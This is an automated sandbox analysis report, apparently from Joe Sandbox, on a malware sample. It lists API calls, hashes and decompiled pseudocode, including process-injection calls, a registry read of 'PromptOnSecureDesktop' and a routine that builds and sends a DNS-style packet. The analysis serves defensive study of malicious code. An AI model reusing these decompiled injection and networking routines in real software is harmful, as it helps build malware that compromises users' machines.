                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$CloseCreateHandlePathTempWritelstrlenwsprintf
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 2439722600-2980165447
                                                                                                                                  • Opcode ID: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                                                                  • Instruction ID: 1a8fae83a8f71e2742470a562e1eaf82921c641c1c5f2c09fe42e90303d3a14b
                                                                                                                                  • Opcode Fuzzy Hash: 15e5744a609ce20ae0f07ead06a63c4ecb295d114b6c11b49a51968f57c888d1
                                                                                                                                  • Instruction Fuzzy Hash: 711184B17401147BE7207731ED0EFEF3A6EDBC8B10F008066BB0AE5191EEB48E518664
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD99E3 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82threadinjectionprocessCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00AD9A18
                                                                                                                                  • GetThreadContext.KERNEL32(?,?), ref: 00AD9A52
                                                                                                                                  • TerminateProcess.KERNEL32(?,00000000), ref: 00AD9A60
                                                                                                                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00AD9A98
                                                                                                                                  • SetThreadContext.KERNEL32(?,00010002), ref: 00AD9AB5
                                                                                                                                  • ResumeThread.KERNEL32(?), ref: 00AD9AC2
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ProcessThread$Context$CreateMemoryResumeTerminateWrite
                                                                                                                                  • String ID: D
                                                                                                                                  • API String ID: 2981417381-2746444292
                                                                                                                                  • Opcode ID: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
                                                                                                                                  • Instruction ID: f6e401de016b6237e869c9bf79d7ea15add8372e385cc0e98e449091a090443d
                                                                                                                                  • Opcode Fuzzy Hash: e2726c898831fa2e77ccd26efcb7f3ad26579022b5c1c2510a23e725eb230ef9
                                                                                                                                  • Instruction Fuzzy Hash: 3E213DB2901119BBDB119BA1DC09EEF7BBCEF04790F404062BA1AE6160E775CA45CBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD1C03 Relevance: 12.1, APIs: 8, Instructions: 106memorylibraryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • inet_addr.WS2_32(004102D8), ref: 00AD1C18
                                                                                                                                  • LoadLibraryA.KERNEL32(004102C8), ref: 00AD1C26
                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00AD1C84
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00000000,00000288), ref: 00AD1C9D
                                                                                                                                  • RtlReAllocateHeap.NTDLL(?,00000000,00000000,?), ref: 00AD1CC1
                                                                                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 00AD1D02
                                                                                                                                  • FreeLibrary.KERNEL32(?), ref: 00AD1D0B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$AllocateFreeLibrary$LoadProcessinet_addr
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2324436984-0
                                                                                                                                  • Opcode ID: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
                                                                                                                                  • Instruction ID: 90b34e68aed0a9e7bea192b26e1a8b06799eaf750d7a687c5df65f9cdd5954cf
                                                                                                                                  • Opcode Fuzzy Hash: 86649b882a12f673409f1c62972542be89ea1fb211e92df17ca9b312c060c3f6
                                                                                                                                  • Instruction Fuzzy Hash: AD312972E00219BFCB519FE4DC888FEBBBAEB45751B24447AF502A6210D7B54E80DB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042E52A Relevance: 10.7, APIs: 7, Instructions: 238COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _write_multi_char$__get_printf_count_output__mbtowc_l_get_int_arg_write_string
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4168457693-0
                                                                                                                                  • Opcode ID: f7012a2b4727eafad902f081be100c809fce816dd7738765f83eb90d9cd604d5
                                                                                                                                  • Instruction ID: 6c63f3ddf49572ac79c6d8e251c1f7650864198d5e2a559435b00663c8f182db
                                                                                                                                  • Opcode Fuzzy Hash: f7012a2b4727eafad902f081be100c809fce816dd7738765f83eb90d9cd604d5
                                                                                                                                  • Instruction Fuzzy Hash: 25A181B1E002289BDB24DB46DC81BAEB374AB44308F54449AE6097B282D7786E84CF5D
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADC543 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 182threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 00ADC6B4
                                                                                                                                  • InterlockedIncrement.KERNEL32(00ADC74B), ref: 00ADC715
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0040B535,00000000,?,00ADC747), ref: 00ADC728
                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,00ADC747,00413588,00AD8A77), ref: 00ADC733
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseCountCreateHandleIncrementInterlockedThreadTick
                                                                                                                                  • String ID: 0 v$localcfg
                                                                                                                                  • API String ID: 1026198776-2166502722
                                                                                                                                  • Opcode ID: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                                                                  • Instruction ID: fb385a9c038dda9f2617ed6e52d1e9c1199b94a7eb42c0885444cd293257e9e1
                                                                                                                                  • Opcode Fuzzy Hash: 7930164416072ce379d69f2024e67a12fb5078e265013c4e4f79f9c65834da75
                                                                                                                                  • Instruction Fuzzy Hash: 18513CB1A01B428FD7649F69D68552ABBE9FB48310B90693FE18BC7B90D774F844CB10
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040E3CA Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 136registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040E3CA(void* __edx, void* _a4, char* _a8, intOrPtr* _a12) {
				int* _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				int _v32;
				int* _v36;
				char _v68;
				intOrPtr* _t52;
				int _t69;
				int _t78;
				intOrPtr _t80;
				void* _t82;
				void* _t84;
				void* _t85;
				int _t89;
				void* _t91;
				void* _t92;
				void* _t93;

				_t82 = __edx;
				_v36 = 0;
				if(RegOpenKeyExA(_a4, _a8, 0, 0x20119,  &_v16) != 0) {
					L16:
					return _v36;
				}
				_t52 = _a12;
				_t89 = 0;
				_t6 = _t52 + 1; // 0x4128f9
				_t84 = _t6;
				do {
					_t80 =  *_t52;
					_t52 = _t52 + 1;
				} while (_t80 != 0);
				_t85 = _t52 - _t84;
				_v8 = 0;
				if(_t85 > 0x1c) {
					_t85 = 0x1c;
				}
				E0040EE08( &_v68, _a12, _t85);
				_t56 = _t91 + _t85 - 0x40;
				_v12 = 0;
				_v20 = _t91 + _t85 - 0x40;
				E0040F1ED(0, _t56, 0xa);
				_t93 = _t92 + 0x18;
				if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) != 0) {
					L15:
					RegCloseKey(_v16);
					goto L16;
				} else {
					do {
						_t89 = _t89 + _v12;
						_v8 = _v8 + 1;
						_v12 = 0;
						E0040F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
					} while (RegQueryValueExA(_v16,  &_v68, 0,  &_v24, 0,  &_v12) == 0);
					if(_t89 <= 0) {
						goto L15;
					}
					_v32 = _t89;
					E0040DB2E(_t89);
					_t69 =  *0x4136c4;
					if(_t69 == 0) {
						goto L15;
					}
					_v12 = _t69;
					_v8 = 0;
					while(1) {
						_v28 = _t89;
						E0040F1ED(_v8, _v20, 0xa);
						_t93 = _t93 + 0xc;
						if(RegQueryValueExA(_v16,  &_v68, 0,  &_v24, _v12,  &_v28) != 0) {
							break;
						}
						_t78 = _v28;
						if(_t78 == 0) {
							break;
						}
						_v12 =  &(_v12[_t78]);
						_t89 = _t89 - _t78;
						_v8 = _v8 + 1;
						if(_t89 > 0) {
							continue;
						}
						break;
					}
					_t106 = _t89;
					if(_t89 == 0) {
						E00402544( *0x4136c4,  *0x4136c4, _v32, 0xe4, 0xc8);
						E0040E332(_t82, _t106,  *0x4136c4, _v32);
						_v36 = 1;
					}
					goto L15;
				}
			}























                                                                                                                                  0x0040e3ca
                                                                                                                                  0x0040e3e0
                                                                                                                                  0x0040e3ee
                                                                                                                                  0x0040e528
                                                                                                                                  0x0040e52d
                                                                                                                                  0x0040e52d
                                                                                                                                  0x0040e3f4
                                                                                                                                  0x0040e3f9
                                                                                                                                  0x0040e3fb
                                                                                                                                  0x0040e3fb
                                                                                                                                  0x0040e3fe
                                                                                                                                  0x0040e3fe
                                                                                                                                  0x0040e400
                                                                                                                                  0x0040e401
                                                                                                                                  0x0040e407
                                                                                                                                  0x0040e409
                                                                                                                                  0x0040e40f
                                                                                                                                  0x0040e413
                                                                                                                                  0x0040e413
                                                                                                                                  0x0040e41c
                                                                                                                                  0x0040e421
                                                                                                                                  0x0040e429
                                                                                                                                  0x0040e42c
                                                                                                                                  0x0040e42f
                                                                                                                                  0x0040e43a
                                                                                                                                  0x0040e452
                                                                                                                                  0x0040e51d
                                                                                                                                  0x0040e520
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e458
                                                                                                                                  0x0040e458
                                                                                                                                  0x0040e458
                                                                                                                                  0x0040e45b
                                                                                                                                  0x0040e463
                                                                                                                                  0x0040e469
                                                                                                                                  0x0040e46e
                                                                                                                                  0x0040e484
                                                                                                                                  0x0040e48a
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e491
                                                                                                                                  0x0040e494
                                                                                                                                  0x0040e499
                                                                                                                                  0x0040e4a1
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e4a3
                                                                                                                                  0x0040e4a6
                                                                                                                                  0x0040e4a9
                                                                                                                                  0x0040e4ae
                                                                                                                                  0x0040e4b4
                                                                                                                                  0x0040e4b9
                                                                                                                                  0x0040e4d3
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e4d5
                                                                                                                                  0x0040e4da
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e4dc
                                                                                                                                  0x0040e4df
                                                                                                                                  0x0040e4e1
                                                                                                                                  0x0040e4e6
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e4e6
                                                                                                                                  0x0040e4e8
                                                                                                                                  0x0040e4ea
                                                                                                                                  0x0040e500
                                                                                                                                  0x0040e50e
                                                                                                                                  0x0040e516
                                                                                                                                  0x0040e516
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e4ea

                                                                                                                                  APIs
                                                                                                                                  • RegOpenKeyExA.ADVAPI32(80000001,0040E5F2,00000000,00020119,0040E5F2,PromptOnSecureDesktop), ref: 0040E3E6
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,000000C8,000000E4), ref: 0040E44E
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,00000000,80000001,?,?,?,?,?,?,?,000000C8,000000E4), ref: 0040E482
                                                                                                                                  • RegQueryValueExA.ADVAPI32(0040E5F2,?,00000000,?,80000001,?), ref: 0040E4CF
                                                                                                                                  • RegCloseKey.ADVAPI32(0040E5F2,?,?,?,?,000000C8,000000E4), ref: 0040E520
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 1586453840-2980165447
                                                                                                                                  • Opcode ID: 919e03d4f2ff633a109d2dab258d7b21093642562d8d8bd3785840ecf5c8d3be
                                                                                                                                  • Instruction ID: f21eb42f94b351107ce6bcf9928d909f9cde6c0f887f3b022360bbb50f243882
                                                                                                                                  • Opcode Fuzzy Hash: 919e03d4f2ff633a109d2dab258d7b21093642562d8d8bd3785840ecf5c8d3be
                                                                                                                                  • Instruction Fuzzy Hash: D94106B2D00219BFDF119FD5DC81DEEBBB9EB08308F14487AE910B2291E3359A559B64
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00404280 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 124COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00404280(void* __ecx, intOrPtr _a4) {
				void* _v8;
				unsigned int _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				signed int _t35;
				signed int _t38;
				signed int _t40;
				void* _t67;
				void* _t68;
				void* _t73;
				intOrPtr* _t74;

				_t68 = __ecx;
				_t35 = CreateEventA(0, 1, 1, 0);
				_v8 = _t35;
				if(_t35 != 0) {
					_t38 = E00404000(E00403ECD(_t68),  &_v20);
					if(_t38 == 0) {
						L11:
						_t40 = CloseHandle(_v8) | 0xffffffff;
						L12:
						return _t40;
					}
					_t67 = _v20;
					_t40 = _t38 | 0xffffffff;
					if(_t67 == _t40) {
						goto L12;
					}
					_v16 = E0040ECA5();
					E00403F18(_t67,  &_v16, 4, _v8, 0x7d0);
					if(E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0) == 0 || _v12 != (_v16 >> 2) + _v16) {
						CloseHandle(_t67);
						goto L11;
					} else {
						_v12 = _v12 + (_v12 >> 2);
						E00403F18(_t67,  &_v12, 4, _v8, 0x7d0);
						_v28 = 1;
						_t73 = 0xc;
						_v24 = 1;
						E00403F18(_t67,  &_v28, 8, _v8, 0x7d0);
						_t74 = E0040EBCC(_t73);
						 *_t74 = 0x5e;
						 *((intOrPtr*)(_t74 + 4)) = 2;
						if(_a4 != 0) {
							 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
							 *0x41215a =  *0x41215a + 1;
						} else {
							 *(_t74 + 8) = 1;
						}
						E00403F18(_t67, _t74, _v24, _v8, 0x7d0);
						E0040EC2E(_t74);
						E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0);
						CloseHandle(_v8);
						CloseHandle(_t67);
						_t40 = 0 | _a4 == 0x00000000;
						goto L12;
					}
				}
				return _t35 | 0xffffffff;
			}
















                                                                                                                                  0x00404280
                                                                                                                                  0x00404290
                                                                                                                                  0x00404296
                                                                                                                                  0x0040429b
                                                                                                                                  0x004042b1
                                                                                                                                  0x004042ba
                                                                                                                                  0x004043c1
                                                                                                                                  0x004043ca
                                                                                                                                  0x004043cd
                                                                                                                                  0x00000000
                                                                                                                                  0x004043ce
                                                                                                                                  0x004042c0
                                                                                                                                  0x004042c3
                                                                                                                                  0x004042c8
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004042dc
                                                                                                                                  0x004042e6
                                                                                                                                  0x00404300
                                                                                                                                  0x004043bb
                                                                                                                                  0x00000000
                                                                                                                                  0x00404318
                                                                                                                                  0x00404322
                                                                                                                                  0x0040432c
                                                                                                                                  0x00404333
                                                                                                                                  0x00404336
                                                                                                                                  0x00404342
                                                                                                                                  0x00404345
                                                                                                                                  0x00404350
                                                                                                                                  0x00404359
                                                                                                                                  0x0040435f
                                                                                                                                  0x00404366
                                                                                                                                  0x00404371
                                                                                                                                  0x00404375
                                                                                                                                  0x00404368
                                                                                                                                  0x00404368
                                                                                                                                  0x00404368
                                                                                                                                  0x00404384
                                                                                                                                  0x0040438a
                                                                                                                                  0x0040439a
                                                                                                                                  0x004043ab
                                                                                                                                  0x004043ae
                                                                                                                                  0x004043b5
                                                                                                                                  0x00000000
                                                                                                                                  0x004043b5
                                                                                                                                  0x00404300
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,PromptOnSecureDesktop,0040A3C7), ref: 00404290
                                                                                                                                  • CloseHandle.KERNEL32(0040A3C7), ref: 004043AB
                                                                                                                                  • CloseHandle.KERNEL32(00000001), ref: 004043AE
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CloseHandle$CreateEvent
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 1371578007-2980165447
                                                                                                                                  • Opcode ID: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
                                                                                                                                  • Instruction ID: 580dd723e2696739ab8c529274da47b2bc3b4765397f1bbb4cd5042057411b76
                                                                                                                                  • Opcode Fuzzy Hash: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
                                                                                                                                  • Instruction Fuzzy Hash: F94181B1900209BADB109BA2CD45F9FBFBCEF40355F104566F614B21C1D7789A51DBA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD6CC7 Relevance: 10.6, APIs: 7, Instructions: 106fileCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00AD6CE4
                                                                                                                                  • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 00AD6D22
                                                                                                                                  • GetLastError.KERNEL32 ref: 00AD6DA7
                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00AD6DB5
                                                                                                                                  • GetLastError.KERNEL32 ref: 00AD6DD6
                                                                                                                                  • DeleteFileA.KERNEL32(?), ref: 00AD6DE7
                                                                                                                                  • GetLastError.KERNEL32 ref: 00AD6DFD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$File$CloseCreateDeleteDiskFreeHandleSpace
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3873183294-0
                                                                                                                                  • Opcode ID: f937a9db21ce505f63fbc05cea0012a17e3f79a74f005ea453ea48b098bba52a
                                                                                                                                  • Instruction ID: e43d51c14e3988db676c6fe6147ac91ea2328b6eebc2dd248e5e12224c434605
                                                                                                                                  • Opcode Fuzzy Hash: f937a9db21ce505f63fbc05cea0012a17e3f79a74f005ea453ea48b098bba52a
                                                                                                                                  • Instruction Fuzzy Hash: 59310376A00649BFCB01EFE4ED48ADE7F7AEB48300F148066E292E3351D7708A45CB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042D487 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: '$0$9
                                                                                                                                  • API String ID: 3120068967-269856862
                                                                                                                                  • Opcode ID: 7bbc5f25a49e61d68743073381ab8708b2bd49eee730fca9a6a09fabe99c0665
                                                                                                                                  • Instruction ID: a00eee181b3eeb95df4b7ce26ca00e0e60aed49754cb2fdd6ab912959dcfa0b4
                                                                                                                                  • Opcode Fuzzy Hash: 7bbc5f25a49e61d68743073381ab8708b2bd49eee730fca9a6a09fabe99c0665
                                                                                                                                  • Instruction Fuzzy Hash: C441E4B1E05229DFEB24CF58D889BAEB7B5BB84304F6481DAD049A7240C7789E81CF45
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004026FF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 96networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 26%
                                                                                                                                  			E004026FF(intOrPtr* __eax, intOrPtr _a4, intOrPtr _a8, long _a12) {
				long* _t33;
				long _t35;
				long* _t36;
				long _t37;
				long _t38;
				short _t39;
				short _t40;
				char _t42;
				intOrPtr _t43;
				void* _t48;
				long* _t49;
				long* _t51;
				long* _t52;
				long* _t53;
				long* _t54;
				void* _t55;
				long* _t56;
				long* _t57;
				long* _t60;
				intOrPtr* _t63;
				intOrPtr* _t65;
				void* _t66;

				_t65 = __eax;
				_t33 =  *0x412bf8; // 0x0
				_t42 = 0;
				if(_t33 == 0) {
					_t33 = E0040EBCC(0x400);
					_pop(_t48);
					 *0x412bf8 = _t33;
				}
				E0040EE2A(_t48, _t33, _t42, 0x400);
				_t35 = GetTickCount();
				_t49 =  *0x412bf8; // 0x0
				_t63 = __imp__#9;
				 *_t49 = _t35;
				_t36 =  *0x412bf8; // 0x0
				_t36[0] = _a12;
				_t37 =  *_t63(1);
				_t51 =  *0x412bf8; // 0x0
				_t51[1] = _t37;
				_t52 =  *0x412bf8; // 0x0
				_t38 = 0;
				_t52[1] = 0;
				_t53 =  *0x412bf8; // 0x0
				_t53[2] = 0;
				_t54 =  *0x412bf8; // 0x0
				_t54[2] = 0;
				_t60 =  *0x412bf8; // 0x0
				_t55 = 0;
				if( *_t65 != _t42) {
					do {
						_t43 =  *((intOrPtr*)(_t38 + _t65));
						_a12 = _t38;
						while(_t43 != 0) {
							if(_t43 != 0x2e) {
								_a12 = _a12 + 1;
								_t43 =  *((intOrPtr*)(_a12 + _t65));
								continue;
							}
							break;
						}
						 *((char*)(_t55 +  &(_t60[3]))) = _a12 - _t38;
						_t55 = _t55 + 1;
						while(_t38 < _a12) {
							 *((char*)(_t55 +  &(_t60[3]))) =  *((intOrPtr*)(_t38 + _t65));
							_t55 = _t55 + 1;
							_t38 = _t38 + 1;
						}
						if( *((char*)(_t38 + _t65)) == 0x2e) {
							_t38 = _t38 + 1;
						}
						_t42 = 0;
					} while ( *((intOrPtr*)(_t38 + _t65)) != 0);
				}
				 *((char*)(_t55 +  &(_t60[3]))) = _t42;
				_t24 = _t55 + 0xd; // 0xf
				_t66 = _t24;
				_t39 =  *_t63(0xf);
				_t56 =  *0x412bf8; // 0x0
				 *((short*)(_t56 + _t66)) = _t39;
				_t40 =  *_t63(1);
				_t57 =  *0x412bf8; // 0x0
				 *((short*)(_t57 + _t66 + 2)) = _t40;
				__imp__#20(_a4, 0x412bf8, _t66 + 4, _t42, _a8, 0x10);
				return 0 | _t40 <= 0x00000000;
			}

























                                                                                                                                  0x00402704
                                                                                                                                  0x00402706
                                                                                                                                  0x0040270b
                                                                                                                                  0x00402715
                                                                                                                                  0x00402718
                                                                                                                                  0x0040271d
                                                                                                                                  0x0040271e
                                                                                                                                  0x0040271e
                                                                                                                                  0x00402726
                                                                                                                                  0x0040272e
                                                                                                                                  0x00402734
                                                                                                                                  0x0040273a
                                                                                                                                  0x00402740
                                                                                                                                  0x00402743
                                                                                                                                  0x0040274e
                                                                                                                                  0x00402752
                                                                                                                                  0x00402754
                                                                                                                                  0x0040275a
                                                                                                                                  0x0040275e
                                                                                                                                  0x00402764
                                                                                                                                  0x00402766
                                                                                                                                  0x0040276a
                                                                                                                                  0x00402770
                                                                                                                                  0x00402774
                                                                                                                                  0x0040277a
                                                                                                                                  0x0040277e
                                                                                                                                  0x00402784
                                                                                                                                  0x00402788
                                                                                                                                  0x0040278a
                                                                                                                                  0x0040278a
                                                                                                                                  0x0040278d
                                                                                                                                  0x004027a0
                                                                                                                                  0x00402795
                                                                                                                                  0x00402797
                                                                                                                                  0x0040279d
                                                                                                                                  0x00000000
                                                                                                                                  0x0040279d
                                                                                                                                  0x00000000
                                                                                                                                  0x00402795
                                                                                                                                  0x004027a9
                                                                                                                                  0x004027ad
                                                                                                                                  0x004027b9
                                                                                                                                  0x004027b3
                                                                                                                                  0x004027b7
                                                                                                                                  0x004027b8
                                                                                                                                  0x004027b8
                                                                                                                                  0x004027c2
                                                                                                                                  0x004027c4
                                                                                                                                  0x004027c4
                                                                                                                                  0x004027c5
                                                                                                                                  0x004027c7
                                                                                                                                  0x0040278a
                                                                                                                                  0x004027ce
                                                                                                                                  0x004027d2
                                                                                                                                  0x004027d2
                                                                                                                                  0x004027d5
                                                                                                                                  0x004027d7
                                                                                                                                  0x004027df
                                                                                                                                  0x004027e3
                                                                                                                                  0x004027e5
                                                                                                                                  0x004027f0
                                                                                                                                  0x00402802
                                                                                                                                  0x00402815

                                                                                                                                  APIs
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040272E
                                                                                                                                  • htons.WS2_32(00000001), ref: 00402752
                                                                                                                                  • htons.WS2_32(0000000F), ref: 004027D5
                                                                                                                                  • htons.WS2_32(00000001), ref: 004027E3
                                                                                                                                  • sendto.WS2_32(?,00412BF8,00000009,00000000,00000010,00000010), ref: 00402802
                                                                                                                                    • Part of subcall function 0040EBCC: GetProcessHeap.KERNEL32(00000000,00000000,80000001,0040EBFE,7FFF0001,?,0040DB55,7FFF0001), ref: 0040EBD3
                                                                                                                                    • Part of subcall function 0040EBCC: RtlAllocateHeap.NTDLL(00000000,?,0040DB55,7FFF0001), ref: 0040EBDA
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: htons$Heap$AllocateCountProcessTicksendto
                                                                                                                                  • String ID: 0 v
                                                                                                                                  • API String ID: 1128258776-3142137124
                                                                                                                                  • Opcode ID: 6324b7b9e2dccaab36c5df195a5e4e953a761730b1da31182c129fee2206b1b7
                                                                                                                                  • Instruction ID: e317574a351225f02cdc10e669db3389ba019fd1a924c3d0ab3f78f3d9a30560
